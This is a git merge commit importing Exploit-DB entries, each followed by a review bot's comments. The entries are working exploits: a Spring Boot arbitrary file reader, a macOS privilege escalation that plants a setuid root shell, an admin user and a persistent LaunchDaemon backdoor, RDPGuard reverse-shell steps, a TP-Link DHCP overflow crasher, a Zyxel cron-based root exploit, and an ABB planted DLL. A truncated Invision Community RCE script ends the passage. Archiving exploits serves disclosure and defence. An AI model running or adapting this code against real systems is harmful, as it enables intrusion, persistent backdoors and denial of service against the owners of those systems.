Merge remote-tracking branch 'exploitdb/main'

This commit is contained in:
Brendan McDevitt 2025-06-06 00:55:43 +00:00
commit bf635dcdf2
32 changed files with 4879 additions and 0 deletions

exploits/java/webapps/52304.py Executable file

@ -0,0 +1,57 @@
# Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read
# Google Dork:
# Date: 23/May/2025
# Exploit Author: d3sca
# Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase
# Software Link: https://github.com/OsamaTaher/Java-springboot-codebase
# Version: [app version] 1.1
# Tested on: Debian Linux
# CVE : CVE-2025-46822
#usage: python3 cve-2025-46822.py http://victim.com /etc/passwd
import argparse
import requests
from urllib.parse import quote
def exploit(target, file_path, output=None):
# Ensure the file path is absolute
if not file_path.startswith('/'):
print("[!] Warning: File path is not absolute. Prepending '/' to make it absolute.")
file_path = '/' + file_path.lstrip('/')
# URL-encode the file path
encoded_path = quote(file_path, safe='')
# Construct the target URL
endpoint = f"/api/v1/files/{encoded_path}"
url = target.rstrip('/') + endpoint
print(f"[*] Attempting to retrieve: {file_path}")
print(f"[*] Sending request to: {url}")
try:
response = requests.get(url, allow_redirects=False, timeout=10)
if response.status_code == 200:
print("[+] File retrieved successfully!")
if output:
with open(output, 'wb') as f:
f.write(response.content)
print(f"[+] Content saved to: {output}")
else:
print("\nFile contents:")
print(response.text)
else:
print(f"[-] Failed to retrieve file. Status code: {response.status_code}")
print(f"[-] Response: {response.text[:200]}") # Show first 200 chars of response
except Exception as e:
print(f"[-] An error occurred: {str(e)}")
if name == "main":
parser = argparse.ArgumentParser(description="Exploit Path Traversal Vulnerability in Unauthenticated File API")
parser.add_argument("target", help="Target base URL (e.g., http://victim:8080)")
parser.add_argument("file_path", help="Absolute path to target file (e.g., /etc/passwd)")
parser.add_argument("-o", "--output", help="Output file to save contents")
args = parser.parse_args()
exploit(args.target, args.file_path, args.output)
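Review bot: `if name == "main":` at the end of the hunk compares two undefined names and would raise NameError at import time; the double underscores were most likely lost in rendering, but the archived file should be confirmed to read `if __name__ == "__main__":`. The `except Exception as e:` around the request swallows everything from a typo in the script to a connection failure under one message; `except requests.RequestException as e:` is the narrower catch for what that `try` body can actually raise. The usage line names the script `cve-2025-46822.py` while the file is stored as 52304.py, and the header would benefit from stating that the request path carries the target file as a fully percent-encoded segment (`quote(file_path, safe='')`, so `/` becomes `%2F`), since that is what anyone triaging web logs for this issue needs to know.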

exploits/macos/local/52316.py Executable file

@ -0,0 +1,100 @@
#!/usr/bin/env python3
# Exploit Title: macOS LaunchDaemon iOS 17.2 - Privilege Escalation
# Author: Mohammed Idrees Banyamer (@banyamer_security)
# GitHub: https://github.com/mbanyamer
# Date: 2025-05-31
# Tested on: macOS Sonoma (14.x ARM64 / x86_64)
# CVE: CVE-2025-24085
# Type: Local Privilege Escalation
# Platform: macOS
# Author Country: Jordan
# Description:
# This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute
# arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary,
# creates an admin user, and installs a persistent LaunchDaemon backdoor for root access. It hijacks the
# com.apple.securemonitor LaunchDaemon plist to trigger the payload, allowing unauthorized escalation to root
# on macOS Sonoma systems.
import os
import plistlib
import time
from pathlib import Path
LAUNCHD_PLIST = "/Library/LaunchDaemons/com.apple.securemonitor.plist"
PAYLOAD_SCRIPT = "/tmp/.macroot_payload.sh"
def create_payload():
print("[+] Creating root payload script...")
payload = """#!/bin/bash
# Root shell
cp /bin/bash /tmp/.rootbash
chmod +s /tmp/.rootbash
chown root:wheel /tmp/.rootbash
# Add admin user
sysadminctl -addUser pentest -password macOS123! -admin
# Log file
echo "[+] Root backdoor triggered at $(date)" >> /tmp/.rootlog
# Persistent backdoor
cat <<EOF > /Library/LaunchDaemons/com.apple.backdoor.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.apple.backdoor</string>
<key>ProgramArguments</key><array><string>/tmp/.rootbash</string></array>
<key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
chmod 644 /Library/LaunchDaemons/com.apple.backdoor.plist
chown root:wheel /Library/LaunchDaemons/com.apple.backdoor.plist
"""
with open(PAYLOAD_SCRIPT, "w") as f:
f.write(payload)
os.chmod(PAYLOAD_SCRIPT, 0o755)
def hijack_launchdaemon():
print("[+] Hijacking LaunchDaemon plist...")
if not Path(LAUNCHD_PLIST).exists():
# create a fake one
print("[*] Creating fake LaunchDaemon plist for exploitation...")
plist_data = {
'Label': 'com.apple.securemonitor',
'ProgramArguments': [PAYLOAD_SCRIPT],
'RunAtLoad': True,
}
with open(LAUNCHD_PLIST, "wb") as f:
plistlib.dump(plist_data, f)
else:
# hijack existing one
with open(LAUNCHD_PLIST, 'rb') as f:
plist = plistlib.load(f)
plist['ProgramArguments'] = [PAYLOAD_SCRIPT]
plist['RunAtLoad'] = True
with open(LAUNCHD_PLIST, 'wb') as f:
plistlib.dump(plist, f)
os.system(f"chmod 644 {LAUNCHD_PLIST}")
os.system(f"chown root:wheel {LAUNCHD_PLIST}")
def trigger_payload():
print("[+] Triggering LaunchDaemon manually...")
os.system(f"sudo launchctl load -w {LAUNCHD_PLIST}")
print("[+] Done. You can now execute /tmp/.rootbash -p for root shell")
def main():
if os.geteuid() == 0:
print("[!] You are already root. No need to exploit.")
return
create_payload()
hijack_launchdaemon()
print("[+] Exploit completed. Reboot or run manually:")
print(f" sudo launchctl load -w {LAUNCHD_PLIST}")
print(" Then run: /tmp/.rootbash -p")
if __name__ == "__main__":
main()
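Review bot: `main()` returns early when `os.geteuid() == 0`, yet every location `create_payload()` and `hijack_launchdaemon()` then write to — `open(LAUNCHD_PLIST, "wb")` under `/Library/LaunchDaemons/` and the `chmod 644`/`chown root:wheel` via `os.system` — is root-writable only, so in the non-root case the script raises PermissionError before any boundary is crossed; the header never states the precondition that would make that plist writable, which is the entire claimed vulnerability and should be documented or the PoC marked unverified. The title says "iOS 17.2" while "Tested on" says macOS Sonoma 14.x; the header should reconcile the two. For anyone triaging a host, the artifacts the script leaves are all named in the file (`/tmp/.macroot_payload.sh`, `/tmp/.rootbash`, `/tmp/.rootlog`, `/Library/LaunchDaemons/com.apple.backdoor.plist`, local user `pentest`), and a `# Artifacts:` line in the header listing them would make the archive entry useful to defenders as well.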


@ -0,0 +1,20 @@
# Exploit Title: RDPGuard 9.9.9 - Privilege Escalation
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 09.05.2025
# Vendor Homepage: https://rdpguard.com
# Software Link: https://rdpguard.com/download.aspx
# Tested Version: 9.9.9 (latest)
# Tested on: Windows 10 (32bit)
# # # Steps to Reproduce # # #
# 1. Prepare a .bat file containing your reverse shell code.
# 2. Open RDPGuard.
# 3. Navigate to Tools > Custom Actions / Notifications.
# 4. Click the "Add" button.
# 5. Leave "Event" as "IP Blocked".
# 6. Select "Execute Program" from the "Action" dropdown.
# 7. Under the "Program/script" field, select your prepared .bat file.
# 8. Set up your listener.
# 9. Click "Test Run".
# 10. A reverse shell as NT AUTHORITY\SYSTEM is obtained!


@ -0,0 +1,338 @@
/*
* Exploit Title: TP-Link VN020 F3v(T) TT_V6.2.1021) - DHCP Stack Buffer Overflow
* Date: 10/20/2024
* Exploit Author: Mohamed Maatallah
* Vendor Homepage: https://www.tp-link.com
* Version: TT_V6.2.1021 (VN020-F3v(T))
* Tested on: VN020-F3v(T) Router (Hardware Version 1.0)
* CVE: CVE-2024-11237
* Category: Remote
* Technical Details:
* -----------------
* - Triggers multiple memory corruption vectors in DHCP parsing
* - Primary vector: Stack overflow via oversized hostname (127 bytes)
* - Secondary vector: Parser confusion via malformed length fields
* - Tertiary vector: Vendor specific option parsing edge case
*
* Attack Surface:
* --------------
* - DHCP service running on port 67
* - Processes broadcast DISCOVER packets
* - No authentication required
* - Affects all routers running VN020 F3v(t) specifically the ones
* supplied by Tunisie Telecom & Topnet
*
* Exploitation Method:
* ------------------
* 1. Sends crafted DHCP DISCOVER packet
* 2. Overflows hostname buffer (64 -> 127 bytes)
* 3. Corrupts length fields in DHCP options
* 4. Success = No response (service crash)
*
* Build:
* ------
* Windows: cl poc.c /o tplink_dhcp.exe or use visual studio directly.
*
* Usage:
* ------
* tplink_dhcp.exe
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <Ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
// Standard DHCP ports - Server listens on 67, clients send from 68
#define DHCP_SERVER_PORT 67
#define DHCP_CLIENT_PORT 68
#define MAX_PACKET_SIZE 1024 // Maximum size for DHCP packet
#define MAX_ATTEMPTS 3
// Forward declarations of functions
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length);
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data);
void tp_link(unsigned char* packet, int* offset);
void print_packet_hex(unsigned char* packet, int length);
int wait_for_response(SOCKET sock, int timeout);
int main() {
WSADATA wsa;
SOCKET sock;
struct sockaddr_in dest;
unsigned char packet[MAX_PACKET_SIZE]; // Buffer for DHCP packet
int packet_length = 0; // Length of constructed packet
int attempts = 0; // Counter for send attempts
int success = 0;
printf("[TP-Thumper] Initializing Winsock...\n");
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
printf("[TP-Thumper] Winsock initialization failed. Error: %d\n",
WSAGetLastError());
return 1;
}
sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if (sock == INVALID_SOCKET) {
printf("[TP-Thumper] Could not create socket. Error: %d\n",
WSAGetLastError());
WSACleanup();
return 1;
}
// Set up broadcast address (255.255.255.255)
dest.sin_family = AF_INET;
dest.sin_port = htons(DHCP_SERVER_PORT);
dest.sin_addr.s_addr = inet_addr("255.255.255.255");
// Enable broadcast mode on socket
BOOL broadcast = TRUE;
if (setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char*)&broadcast,
sizeof(broadcast)) < 0) {
printf("[TP-Thumper] Broadcast mode failed.\n");
closesocket(sock);
WSACleanup();
return 1;
}
srand((unsigned int)time(NULL));
// Create the DHCP DISCOVER packet
create_dhcp_discover_packet(packet, &packet_length);
// Main attempt loop - tries to send packet MAX_ATTEMPTS times
while (attempts < MAX_ATTEMPTS && !success) {
printf("[TP-Thumper] Sending DHCP Discover packet (Attempt %d/%d)...\n",
attempts + 1, MAX_ATTEMPTS);
print_packet_hex(packet, packet_length); //debug
// Send the packet
if (sendto(sock, (char*)packet, packet_length, 0, (struct sockaddr*)&dest,
sizeof(dest)) < 0) {
printf("[TP-Thumper] Packet send failed. Error: %d\n", WSAGetLastError());
}
else {
printf("[TP-Thumper] Packet sent. Waiting for router response...\n");
if (wait_for_response(sock, 10)) {
printf(
"[TP-Thumper] Router responded! Exploit may not have succeeded.\n");
success = 1;
}
else {
printf("[TP-Thumper] No response received within timeout.\n");
}
}
attempts++;
}
if (!success) {
printf(
"[TP-Thumper] Exploit succeeded: No router response after %d "
"attempts.\n",
MAX_ATTEMPTS);
}
else {
printf("[TP-Thumper] Exploit failed: Router responded within timeout.\n");
}
// Cleanup
closesocket(sock);
WSACleanup();
return 0;
}
/*
* DHCP Message Format:
* [0x00]: op = 0x01 ; BOOTREQUEST
* [0x01]: htype = 0x01 ; Ethernet
* [0x02]: hlen = 0x06 ; MAC addr len
* [0x03]: hops = 0x00 ; No relay
* [0x04-0x07]: xid ; Random transaction ID
* [0x08-0x0F]: secs + flags ; Broadcast flags set
* [0x10-0x1F]: ciaddr + yiaddr ; Empty
* [0x20-0x27]: siaddr + giaddr ; Empty
* [0x28-0x2D]: chaddr ; Crafted MAC
*/
void create_dhcp_discover_packet(unsigned char* packet, int* packet_length) {
memset(packet, 0, MAX_PACKET_SIZE);
int offset = 0;
// DHCP Header - Standard fields
packet[offset++] = 0x01; // BOOTREQUEST
packet[offset++] = 0x01; // Ethernet
packet[offset++] = 0x06; // MAC len
packet[offset++] = 0x00; // No hops
// ; XID - rand() used for bypass of response filtering
// ; mov eax, rand()
// ; mov [packet + 4], eax
unsigned int xid = (unsigned int)rand();
*((unsigned int*)&packet[offset]) = htonl(xid);
offset += 4;
// ; Flags - Set broadcast bit to force response
// ; mov word [packet + 8], 0x0000 ; secs elapsed
// ; mov word [packet + 10], 0x8000 ; broadcast flag
packet[offset++] = 0x00;
packet[offset++] = 0x00;
packet[offset++] = 0x80;
packet[offset++] = 0x00;
// Zero IP fields - forces DHCP server parse
memset(&packet[offset], 0, 16);
offset += 16;
// ; Crafted MAC - DE:AD:BE:EF:00:01
// ; Used for unique client tracking, bypasses MAC filters
packet[offset++] = 0xDE;
packet[offset++] = 0xAD;
packet[offset++] = 0xBE;
packet[offset++] = 0xEF;
packet[offset++] = 0x00;
packet[offset++] = 0x01;
memset(&packet[offset], 0x00, 10);
offset += 10;
// ; Skip server name/boot filename
// ; Total padding: 192 bytes
memset(&packet[offset], 0x00, 64);
offset += 64;
memset(&packet[offset], 0x00, 128);
offset += 128;
// ; DHCP Magic Cookie
// ; 0x63825363 = DHCP in natural order
packet[offset++] = 0x63;
packet[offset++] = 0x82;
packet[offset++] = 0x53;
packet[offset++] = 0x63;
// ; Stack layout after this point:
// ; [ebp+0] = DHCP header
// ; [ebp+240] = DHCP options start
// ; Router parses sequentially from this point
add_option(packet, &offset, 0x35, 0x01, (unsigned char[]) { 0x01 });
add_option(packet, &offset, 0x37, 4,
(unsigned char[]) {
0x01, 0x03, 0x06, 0x0F
});
// ; Trigger overflow conditions
tp_link(packet, &offset);
packet[offset++] = 0xFF; // End option
*packet_length = offset;
}
void tp_link(unsigned char* packet, int* offset) {
// ; Vendor specific overflow - triggers parser state confusion
// ; 0x00,0x14,0x22 = TP-Link vendor prefix
// ; Following 0xFF bytes cause length validation bypass
unsigned char vendor_specific[] = { 0x00, 0x14, 0x22, 0xFF, 0xFF, 0xFF };
add_option(packet, offset, 0x2B, sizeof(vendor_specific), vendor_specific);
// ; Stack buffer overflow via hostname
// ; Router allocates 64-byte buffer but we send 127
// ; Overwrites adjacent stack frame
unsigned char long_hostname[128];
memset(long_hostname, 'A', sizeof(long_hostname) - 1);
long_hostname[127] = '\0';
add_option(packet, offset, 0x0C, 127, long_hostname);
// ; Length field exploit
// ; Claims 255 bytes but only sends 1
// ; Router assumes full length during memory operations
// ; leads to read/write past buffer
add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 });
}
// ; Helper for DHCP option construction
// ; option = option code
// ; length = claimed length (can be falsified)
// ; data = actual payload
void add_option(unsigned char* packet, int* offset, unsigned char option,
unsigned char length, unsigned char* data) {
packet[(*offset)++] = option; // Option type
packet[(*offset)++] = length; // Claimed length
memcpy(&packet[*offset], data, length);
*offset += length;
}
// Debug
void print_packet_hex(unsigned char* packet, int length) {
printf("[TP-Thumper] Packet Hex Dump:\n");
// Print header fields with labels
printf("Opcode (op): %02X\n", packet[0]);
printf("Hardware Type (htype): %02X\n", packet[1]);
printf("Hardware Address Length (hlen): %02X\n", packet[2]);
printf("Hops: %02X\n", packet[3]);
// Transaction ID
printf("Transaction ID (xid): ");
for (int i = 4; i < 8; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Flags
printf("Flags: ");
for (int i = 10; i < 12; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// Client Hardware Address (MAC)
printf("Client Hardware Address (chaddr): ");
for (int i = 28; i < 34; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Magic Cookie
printf("Magic Cookie: ");
for (int i = 236; i < 240; i++) {
printf("%02X ", packet[i]);
}
printf("\n");
// DHCP Options
printf("DHCP Options:\n");
int i = 240;
while (i < length) {
printf(" Option: %02X, Length: %02X, Data: ", packet[i], packet[i + 1]);
int option_length = packet[i + 1];
for (int j = 0; j < option_length; j++) {
printf("%02X ", packet[i + 2 + j]);
}
printf("\n");
i += 2 + option_length;
if (packet[i] == 0xFF) {
printf(" End of Options\n");
break;
}
}
}
// Wait for router response with timeout
int wait_for_response(SOCKET sock, int timeout) {
struct timeval tv;
tv.tv_sec = timeout;
tv.tv_usec = 0;
// Set up file descriptor set for select()
fd_set readfds;
FD_ZERO(&readfds);
FD_SET(sock, &readfds);
// Wait for data or timeout
int result = select(0, &readfds, NULL, NULL, &tv);
return result > 0; // Returns true if data available
}
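Review bot: `add_option` copies `length` bytes with `memcpy(&packet[*offset], data, length)` regardless of how large `data` really is, so the call `add_option(packet, offset, 0x3D, 0xFF, (unsigned char[]) { 0x01 })` reads 254 bytes past a one-byte compound literal on the sender's own stack — undefined behaviour — and the option goes out carrying 255 bytes of the sending host's stack contents, not the single byte that the comment `Claims 255 bytes but only sends 1` describes. That comment should be corrected so readers are not misled about what the packet contains (and about what leaves the test machine). In `print_packet_hex`, `packet[i]` is dereferenced after `i += 2 + option_length` with no check against `length`, so the final iteration can read beyond the constructed packet when no end option is present. The stack-layout comments (`[ebp+0] = DHCP header`, `[ebp+240] = DHCP options start`) describe the router's parser and are not verifiable from this file; they read as fact and should be hedged as inferred.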


@ -0,0 +1,131 @@
# Exploit Title: Zyxel USG FLEX H series uOS 1.31 - Privilege Escalation
# Date: 2025-04-23
# Exploit Author: Marco Ivaldi
# Vendor Homepage: https://www.zyxel.com/
# Version: Zyxel uOS V1.31 (see
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-=
=3D
advisory-for-incorrect-permission-assignment-and-improper-privilege-managem=
=3D
ent-vulnerabilities-in-usg-flex-h-series-firewalls-04-22-2025)
# Tested on: Zyxel FLEX100H with Firmware V1.31(ABXF.0) and Zyxel
FLEX200H with Firmware V1.31(ABWV.0)
# CVE: CVE-2025-1731
#!/bin/sh
#
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# "So we wait, this is our labour... we wait."
# -- Anthony Swofford on fuzzing
#
# The setuid root binary program `/usr/sbin/fermion-wrapper` distributed by
# Zyxel with some of their appliances follows symbolic links in the `/tmp`
# directory when run with the `register-status` argument. This allows local
# users with access to a Linux OS shell to trick the program into creating
# writable files at arbitrary locations in the filesystem. This vulnerability
# can be exploited to overwrite arbitrary files or locally escalate privileges
# from low-privileged user (e.g., `postgres`) to root.
#
# Note: the `/tmp` directory doesn't have the sticky bit set, which simplifies
# exploitation of this vulnerability and may also cause all sorts of havoc.
#
# ## Vulnerability information
#
# * CVE ID - CVE-2025-1731
# * High - 7.8 - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
# * CWE-61 - https://cwe.mitre.org/data/definitions/61.html
#
# ## Relevant links
#
# * https://github.com/hnsecurity/vulns/blob/main/HNS-2025-10-zyxel-fermion.txt
# * https://security.humanativaspa.it/local-privilege-escalation-on-zyxel-usg-flex-h-series-cve-2025-1731
# * https://0xdeadc0de.xyz/blog/cve-2025-1731_cve-2025-1732
# * https://security.humanativaspa.it/tag/zyxel/
#
# ## Usage example
#
# ```
# $ ./raptor_fermion
# raptor_fermion - Zyxel fermion-wrapper root LPE exploit
# Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# [*] Exploiting /usr/sbin/fermion-wrapper
# $ uname -a
# Linux FLEX100H-HackerHood 4.14.207-10.3.7.0-2 #5 SMP PREEMPT Thu Jan 9 04:34:58 UTC 2025 aarch64 GNU/Linux
# $ id
# uid=502(postgres) gid=502(postgres) groups=502(postgres)
# $ ls -l /usr/sbin/fermion-wrapper
# -rwsr-xr-x 1 root root 44288 Jan 9 05:34 /usr/sbin/fermion-wrapper
# {"status": 0, "registered": 1, "nebula_registered": 1, "bundle": 1}
#
# [+] Everything looks good \o/, wait an hour and check /tmp/pwned
# $ ls -l /etc/cron.d/runme
# -rw-rw-rw- 1 root postgres 79 Feb 14 15:52 /etc/cron.d/runme
# $ cat /etc/cron.d/runme
# * * * * * cp /bin/sh /tmp/pwned; chmod 4755 /tmp/pwned; rm /etc/cron.d/runme
#
# [+] Run the shell as follows to bypass bash checks: /tmp/pwned -p
#
# [about one hour later...]
#
# $ ls -l /tmp/pwned
# -rwsr-xr-x 1 root root 916608 Feb 14 16:25 /tmp/pwned
# $ /tmp/pwned -p
# # id
# uid=502(postgres) gid=502(postgres) euid=0(root) groups=502(postgres)
# # R00t D4nc3!!!111! \o/
# ```
#
# ## Tested on
#
# * Zyxel FLEX100H with Firmware V1.31(ABXF.0) | 2025-01-09 04:35:47
# * Zyxel FLEX200H with Firmware V1.31(ABWV.0) | 2025-01-09 05:11:31
#
# *Note: other products and firmware versions may also be vulnerable.*
#
# ## Special thanks
#
# * Alessandro Sgreccia (@rainpwn) of HackerHood for his research and devices
#
echo "raptor_fermion - Zyxel fermion-wrapper root LPE exploit"
echo "Copyright (c) 2025 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo
target="/usr/sbin/fermion-wrapper"
tmpfile="/tmp/register_status"
runme="/etc/cron.d/runme"
shell="/tmp/pwned"
echo "[*] Exploiting $target"
echo "$ uname -a"
uname -a
echo "$ id"
id
echo "$ ls -l $target"
ls -l $target
umask 0
rm $tmpfile
ln -s $runme /tmp/register_status
$target register-status
echo "* * * * * cp /bin/sh $shell; chmod 4755 $shell; rm $runme" > $runme
if [ "`cat $runme 2>/dev/null`" = "" ]; then
echo "[!] Error: something went wrong ¯\\_(ツ)_/¯"
exit 1
fi
echo
echo "[+] Everything looks good \\o/, wait an hour and check $shell"
echo "$ ls -l $runme"
ls -l $runme
echo "$ cat $runme"
cat $runme
echo
echo "[+] Run the shell as follows to bypass bash checks: $shell -p"
echo
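Review bot: The `#!/bin/sh` line sits after the Exploit-DB header comments rather than on line 1, so it is an ordinary comment and the file's interpreter is whatever the caller happens to use; the header block and the script should be clearly separated or the shebang kept first. The `# Version:` URL in the header is garbled with quoted-printable soft line breaks (`=` at line ends and `=3D` standing for `=`) and should be restored to a single URL. On the defensive side, the indicators are already spelled out in the script body (`/tmp/register_status` as a symlink, a world-writable `/etc/cron.d/runme`, `/tmp/pwned`) and the header's note that `/tmp` lacks the sticky bit is the relevant hardening gap; a `# Indicators:` line summarising them would help anyone reading the archive for triage.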


@ -0,0 +1,111 @@
# Exploit Title: ABB Cylon Aspect Studio 3.08.03 - Binary Planting
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: <=3.08.03
# Tested on: Microsoft Windows 10 Home (EN) OpenJDK 64-Bit Server VM Temurin-21.0.6+7
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience
# Advisory ID: ZSL-2025-5952
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5952.php
# CVE ID: CVE-2024-13946
# CVE URL: https://www.cve.org/CVERecord/SearchResults?query=CVE-2024-13946
C:\> type project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
C:\Aspect\Aspect-Studio-3.08.03> del CylonLicence.dll
C:\Aspect\Aspect-Studio-3.08.03> type aspect.bat
REM 64bit parameters
jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03-a09>aspect.bat
C:\Aspect\Aspect-Studio-3.08.03-a09>REM 64bit parameters
C:\Aspect\Aspect-Studio-3.08.03-a09>jre\bin\javaw -Dormlite.networkpoint.load=true -Dfile.encoding="UTF-8" -DlookAndFeel=nimbus -DMapGraphic.forceLoad=0 -DBACnet.discovery.driverPort=4224 -DBACnet.discovery.debugLevel=0 -Djava.library.path=. -DportPool.maxPortWaitTime=10000 -DOverride.enabled=false -Dlog4j.configuration=./log4j.aspectstudio.properties -Dswing.noxp=true -Dsun.java2d.d3d=false -Dsun.java2d.noddraw=true -XX:+UseG1GC -XX:MaxGCPauseMillis=200 -XX:InitiatingHeapOccupancyPercent=25 -Xss256k -Xms1024m -Xmx4096m -jar AspectStudioObf.jar
C:\Aspect\Aspect-Studio-3.08.03> type AspectStudio.class
...
...
System.loadLibrary("CylonLicence");
} catch (Throwable t) {}
LoggerUtil.logger.error("Error loading license DLL", t);
}
}
...
...
C:\Aspect\Aspect-Studio-3.08.03> cd logs
C:\Aspect\Aspect-Studio-3.08.03\logs>type AspectStudio.log
ERROR: 2025-01-16 16:47:58,579 Error loading license DLL [main]
java.lang.UnsatisfiedLinkError: no CylonLicence in java.library.path
at java.lang.ClassLoader.loadLibrary(ClassLoader.java:1867)
at java.lang.Runtime.loadLibrary0(Runtime.java:870)
at java.lang.System.loadLibrary(System.java:1122)
at com.aamatrix.util.AspectStudio.<clinit>(AspectStudio.java:42)
at com.aamatrix.vib.rrobin.CylonLicense.<init>(CylonLicense.java:18)
at com.aamatrix.vib.rrobin.LicenseService.<init>(LicenseService.java:38)
at com.aamatrix.vib.rrobin.LicenseService.<clinit>(LicenseService.java:34)
at com.aamatrix.projectmanager.AspectStudio.<clinit>(AspectStudio.java:52)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:348)
at com.aamatrix.projectmanager.AspectStudioLauncher.main(AspectStudioLauncher.java:70)
...
...
C:\DLL-Mala> type CylonLicence.cpp
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <shellapi.h>
extern "C" __declspec(dllexport)
DWORD WINAPI ExecuteCmdThread(LPVOID lpParam) {
ShellExecuteW(NULL, L"open", L"cmd.exe", L"/c start", NULL, SW_SHOWNORMAL);
return 0;
}
extern "C" __declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
CreateThread(NULL, 0, ExecuteCmdThread, NULL, 0, NULL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
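Review bot: The decompiled excerpt `System.loadLibrary("CylonLicence"); } catch (Throwable t) {} LoggerUtil.logger.error("Error loading license DLL", t);` is internally inconsistent — the `catch` body is empty while the logging call that references `t` appears outside it — so it has been mis-transcribed or mis-rendered and should be shown as the actual catch body. The advisory would also benefit from naming the root cause explicitly: `aspect.bat` passes `-Djava.library.path=.`, so `System.loadLibrary` resolves the absent `CylonLicence.dll` from the current working directory, which the log line `no CylonLicence in java.library.path` confirms; the corresponding fix on the vendor side is to load from an absolute path or ship the library, and that is worth one sentence in the header.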


@ -0,0 +1,56 @@
<?php
/*
---------------------------------------------------------------------------
Exploit Title: Invision Community 5.0.6 - Remote Code Execution (RCE)
---------------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://invisioncommunity.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2025-02
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "\n+-------------------------------------------------------------------+";
